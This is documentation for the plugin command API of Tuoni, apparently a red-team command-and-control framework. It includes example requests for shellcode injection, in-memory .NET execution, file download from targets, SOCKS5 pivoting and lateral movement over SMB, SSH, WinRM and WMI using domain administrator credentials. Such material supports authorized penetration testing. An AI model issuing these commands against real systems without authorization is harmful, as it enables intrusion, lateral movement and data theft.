
Plugin commands

List of default plugin commands, their configuration and examples.

Command names vs ID (GUID) values

Tuoni supports multiple commands sharing the same name. Ideally, this occurs only when these commands pertain to different types of agents, though this is not strictly enforceable. Therefore, all commands provided by plugins are also assigned unique ID values (GUID type).

When querying the API for all available command plugins/templates, a list of plugins and their respective commands is returned. Each command in this list includes both a name and a unique ID. While command names may not be unique, their ID values always are.

Because GUIDs are unique per server instance, another field, fullyQualifiedName, can be used to correlate executions of the same command.

To avoid confusion, the list of available commands returned by agent API requests includes command IDs instead of names. This ensures clarity and prevents any potential ambiguity.

Command templates

GET {{url}}/api/v1/command-templates
[
  {
   "id":"72f44650-0011-4562-a474-39acb28725d5",
   "name":"rm",
   "pluginId":"shelldot.commands.fs",
   "scope":"global",
   "qualifiedName":"shelldot.commands.fs:global:rm",
   "fullyQualifiedName":"shelldot.commands.fs:global:rm",
   "description":"Remove a file or a directory on the target"
...

For example, in this environment, the command "powershell" has the ID value fc44c562-a9a6-44b6-b9b4-4f91c4fca8af.

List of agents

GET {{url}}/api/v1/agents
[
  {
    "guid": "4e2b499a-2847-adb6-ec36-3172103a5cbb",
    "firstRegistrationTime": "2024-07-30T18:51:51.059Z",
    "lastCallbackTime": "2024-07-30T18:56:52.385Z",
    "metadata": {
      "guid": "4e2b499a-2847-adb6-ec36-3172103a5cbb",
...
      },
      "customProperties": {}
    },
    "active": true,
    "recentListeners": [
      {
        "id": 2,
        "href": "/api/v1/listeners/2"
      }
    ],
    "availableCommandTemplates": [
      "fc44c562-a9a6-44b6-b9b4-4f91c4fca8af",
      "92f14674-9192-40e6-8dcf-69dd2e9acab6",
...
      "de9a6db5-dd75-4b6a-b012-d77335dc9862",
      "b50f9c9d-b508-4fcf-8e4e-bcba8e8fe28d"
    ]
  }
]

The command ID value fc44c562-a9a6-44b6-b9b4-4f91c4fca8af is also present in the availableCommandTemplates list, indicating that this command is available for this agent.

Using name/ID

The Tuoni server accepts both the command name and ID in the "template" field when sending a command. If a name is used, the server attempts to determine the correct command. In most cases, there should be no conflict, and names can be used reliably, although this is not guaranteed. In the current examples, we continue to use the name value for the sake of readability.
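The name/ID relationship described above, as an added client-side example (not Tuoni's own code and not a description of how the server resolves names). It works on already-parsed JSON shaped like the two responses shown earlier; the second "rm" entry, the `example.plugin` names and the agent's template list are constructed sample data.

```python
from collections import defaultdict

# Constructed sample shaped like GET /api/v1/command-templates. The "rm" and
# "powershell" IDs come from the page; the second "rm" entry and every
# "example.plugin" value are constructed placeholders.
TEMPLATES = [
    {"id": "72f44650-0011-4562-a474-39acb28725d5", "name": "rm",
     "fullyQualifiedName": "shelldot.commands.fs:global:rm"},
    {"id": "00000000-0000-0000-0000-000000000001", "name": "rm",
     "fullyQualifiedName": "example.plugin:global:rm"},
    {"id": "fc44c562-a9a6-44b6-b9b4-4f91c4fca8af", "name": "powershell",
     "fullyQualifiedName": "example.plugin:global:powershell"},
]
# Constructed agent record; only the two fields used here are included.
AGENT = {
    "guid": "4e2b499a-2847-adb6-ec36-3172103a5cbb",
    "availableCommandTemplates": [
        "fc44c562-a9a6-44b6-b9b4-4f91c4fca8af",
        "72f44650-0011-4562-a474-39acb28725d5",
    ],
}

def ambiguous_names(templates):
    """Return {name: [ids]} for every name shared by more than one template."""
    by_name = defaultdict(list)
    for t in templates:
        by_name[t["name"]].append(t["id"])
    return {name: ids for name, ids in by_name.items() if len(ids) > 1}

def resolve(templates, agent, ref):
    """Map a name or ID to exactly one template ID available to the agent."""
    available = set(agent["availableCommandTemplates"])
    matches = [t for t in templates
               if ref in (t["id"], t["name"]) and t["id"] in available]
    if len(matches) != 1:
        raise LookupError(f"{ref!r} matched {len(matches)} templates for this agent")
    return matches[0]["id"]

def correlation_key(templates, template_id):
    """fullyQualifiedName for an ID, for correlating records where GUIDs differ."""
    return next(t["fullyQualifiedName"] for t in templates if t["id"] == template_id)

if __name__ == "__main__":
    print(ambiguous_names(TEMPLATES))
    rm_id = resolve(TEMPLATES, AGENT, "rm")
    print(rm_id, correlation_key(TEMPLATES, rm_id))
```

Recording the resolved ID together with the fullyQualifiedName keeps an audit trail unambiguous even when two plugins share a command name.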

connect-smb

Used along with the "Relay Agent Bind SMB" listener. An agent created using that listener expects a connection from its parent agent, which this command triggers.

Parameters:

  • host: IP or domain name to use to connect to the SMB agent
  • pipename: SMB pipe name to use to connect to the SMB agent

connect-tcp

Used along with the "Relay Agent Bind TCP listener" listener. An agent created using that listener expects a connection from its parent agent, which this command triggers.

Parameters:

  • host: IP or domain to connect to TCP-BIND agent
  • port: TCP port number to connect to TCP-BIND agent

Example (POST content)

{
  "template": "<COMMAND-TEMPLATE-ID>",
  "configuration": {
    "host": "192.168.12.12",
    "port": 8888
  }
}

execute-assembly

Executes a .NET executable in memory

Parameters:

  • executable: .NET executable file content (if provided via the API, it must be base64 encoded)
  • parameters: Parameters to be passed to the .NET executable as command-line arguments

Example (MULTIPART POST content)

------WebKitFormBoundaryGIYTV5nKBPoBJRPT
Content-Disposition: form-data; name="requestBody"; filename="blob"
Content-Type: application/json; encoding=utf-8

{
  "template": "<COMMAND-TEMPLATE-ID>",
  "configuration": {
    "parameters": ["audit"]
  }
}
------WebKitFormBoundaryGIYTV5nKBPoBJRPT
Content-Disposition: form-data; name="executable"; filename="Sharpup.exe"
Content-Type: application/x-ms-dos-executable


------WebKitFormBoundaryGIYTV5nKBPoBJRPT--

rm

Deletes a file on the agent's filesystem

Parameters:

  • filepath: Path of the file to delete (environment variables are supported)

Example (POST content)

{
  "template": "<COMMAND-TEMPLATE-ID>",
  "configuration": {
    "filepath": "c:\\some\\dir\\to_delete.txt"
  }
}

download

Read (and download) a file from the target filesystem

Parameters:

  • filepath: Path of the file to read (environment variables are supported)

Example (POST content)

{
  "template": "<COMMAND-TEMPLATE-ID>",
  "configuration": {
    "filepath": "c:\\some\\dir\\s3cr3t.txt"
  }
}

upload

Write (aka upload) a file to the target filesystem

Parameters:

  • filepath: Path of the file being written (environment variables are supported)
  • file: Content of the file (if provided via the API, it must be base64 encoded)

Example (POST content)

{
  "template": "<COMMAND-TEMPLATE-ID>",
  "configuration": {
    "filepath": "c:\\some\\dir\\hello.txt",
    "data": "SEVMTE8gV09STEQ="
  }
}

inject

Injects and executes shellcode

Parameters:

  • shellcode: Shellcode to execute (if provided via the API, it must be base64 encoded)

Example (POST content)

{
  "template": "<COMMAND-TEMPLATE-ID>",
  "configuration": {
    "shellcode": "{some type of shellcode in base64}"
  }
}

jump-service

Command for lateral movement. You can copy a file to the target machine over SMB and then create and start a service pointing to that file or to any other executable

Parameters:

  • payloadId: Payload used in the jump; should be a service exe
  • copyMethod: Method to use for copying the payload (SMB, NONE)
  • copyPath: Where to copy the file on the target machine
  • target: Target machine IP/name
  • servicePath: Path of the created service
  • serviceName: Name of the created service
  • serviceDisplayName: Display name of the created service
  • username: Username to use for copy and jump (if needed)
  • password: Password to use for copy and jump (if needed)

Example (POST content)

{
  "template": "<COMMAND-TEMPLATE-ID>",
  "configuration": {
    "payloadId": 1,
    "copyMethod": "SMB",
    "copyPath": "c:\\new_service.exe",
    "target": "target-machine",
    "servicePath": "c:\\new_service.exe",
    "serviceName": "new-service",
    "serviceDisplayName": "New service",
    "username": "MYDOMAIN\\Administrator",
    "password": "FunnyItWorkedLastTime!"
  }
}

jump-ssh

Command for lateral movement. You can copy a file to the target machine over SMB and then run it, or any command, over SSH

Parameters:

  • payloadId: Payload used in the jump; should be an executable exe
  • copyMethod: Method to use for copying the payload (SMB, NONE)
  • copyPath: Where to copy the file on the target machine
  • target: Target machine IP/name
  • cmdline: Command line to run on the target machine
  • username: Username to use for copy and jump
  • password: Password to use for copy and jump
  • privateKeyPassword: Password of the private key file

Example (POST content)

{
  "template": "<COMMAND-TEMPLATE-ID>",
  "configuration": {
    "payloadId": 1,
    "copyMethod": "SMB",
    "copyPath": "c:\\new_agent.exe",
    "target": "target-machine",
    "cmdline": "c:\\new_agent.exe",
    "username": "MYDOMAIN\\Administrator",
    "password": "FunnyItWorkedLastTime!"
  }
}

jump-winrm

Command for lateral movement. You can copy a file to the target machine over SMB and then run it, or any PowerShell command, over Windows Remote Management

Parameters:

  • payloadId: Payload used in the jump; should be an executable exe
  • copyMethod: Method to use for copying the payload (SMB, NONE)
  • copyPath: Where to copy the file on the target machine
  • target: Target machine IP/name
  • executablePath: Path of the executable to run
  • customPowershell: Custom PowerShell to run
  • username: Username to use for copy and jump (if needed)
  • password: Password to use for copy and jump (if needed)

Example (POST content)

{
  "template": "<COMMAND-TEMPLATE-ID>",
  "configuration": {
    "payloadId": 1,
    "copyMethod": "SMB",
    "copyPath": "c:\\new_agent.exe",
    "target": "target-machine",
    "executablePath": "c:\\new_agent.exe",
    "username": "MYDOMAIN\\Administrator",
    "password": "FunnyItWorkedLastTime!"
  }
}

jump-wmi

Command for lateral movement. You can copy a file to the target machine over SMB and then run it, or any command, over Windows Management Instrumentation

Parameters:

  • payloadId: Payload used in the jump; should be an executable exe
  • copyMethod: Method to use for copying the payload (SMB, NONE)
  • copyPath: Where to copy the file on the target machine
  • target: Target machine IP/name
  • cmdline: Command line to run on the target machine
  • username: Username to use for copy and jump (if needed)
  • password: Password to use for copy and jump (if needed)

Example (POST content)

{
  "template": "<COMMAND-TEMPLATE-ID>",
  "configuration": {
    "payloadId": 1,
    "copyMethod": "SMB",
    "copyPath": "c:\\new_agent.exe",
    "target": "target-machine",
    "cmdline": "c:\\new_agent.exe",
    "username": "MYDOMAIN\\Administrator",
    "password": "FunnyItWorkedLastTime!"
  }
}

procinfo

Returns additional information about the agent's process

Parameters: None

Example (POST content)

{
  "template": "<COMMAND-TEMPLATE-ID>",
  "configuration": {}
}

screenshot

Takes a screenshot on the target machine and returns the picture

Parameters: None

Example (POST content)

{
  "template": "<COMMAND-TEMPLATE-ID>",
  "configuration": {}
}

socks5

Creates a SOCKS5 proxy into the agent's network

Parameters:

  • port: Port opened by the C2 for the user to use as a SOCKS5 proxy

Example (POST content)

{
  "template": "<COMMAND-TEMPLATE-ID>",
  "configuration": {
    "port": "8765"
  }
}

spawn

Spawns a new agent

Parameters:

  • payloadId: Which listener the agent will connect to
  • payloadType: Type of the payload
  • encryptedCommunication: Whether communication should be encrypted

Example (POST content)

{
  "template": "<COMMAND-TEMPLATE-ID>",
  "configuration": {
    "payloadId": "1",
    "payloadType": "WINDOWS_X64_STAGELESS",
    "encryptedCommunication": true
  }
}